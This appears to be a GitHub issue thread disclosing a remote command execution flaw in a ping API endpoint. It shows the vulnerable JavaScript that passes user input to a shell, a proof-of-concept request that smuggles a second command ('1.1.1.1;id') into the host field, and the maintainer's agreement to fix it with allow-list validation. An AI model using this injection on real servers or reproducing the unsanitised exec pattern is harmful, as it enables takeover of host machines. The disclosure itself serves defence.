[Security] Remote command execution
Using the API /api/common/ping, it's possible to achieve remote command execution on the host machine. This leads to complete control over the machine hosting the server.
To reproduce the vulnerability:
- Download the repo
- Execute `node index.js`
- Login
- Execute this request as shown below:

HTTP request:

```http
POST /api/common/ping HTTP/1.1
Host: 0.0.0.0:8000
User-Agent: bla-bla-bla
Cookie: your-auth-cookie
Content-Length: 15

host=1.1.1.1;id
```
This is the vulnerable code:

```javascript
schema.addWorkflow('ping', function($) {
    var host = $.model.host.replace(/'|"|\n/g, '');
    Exec('ping -c 3 {0}'.format(host), $.done(true));
});
```
Here the problem is that the server doesn't sanitize the input correctly by checking that the provided host is a legitimate one; it also allows characters like `;`, `|` or `&`.
With the code you can edit everything or you can run bash scripts directly. But I agree, this must be sanitised. I'll fix it.
Awesome. Someone could disable functionalities, but that API isn't intended to provide RCE.
Thanks @petersirka
@Will-create can you look at this again? https://github.com/totaljs/code/issues/20
If that field should accept only IPs, why not use a specific regex only for IPs?
The domain name and IP address can be pinged. It is therefore impossible to have an IP validator alone.
Got it. In general an allow-list is preferred over a block-list of entries. In this case the regex must check that only the allowed characters are entered: alphabetic characters (A-Z), numeric characters (0-9), the minus sign (-), and the period (.).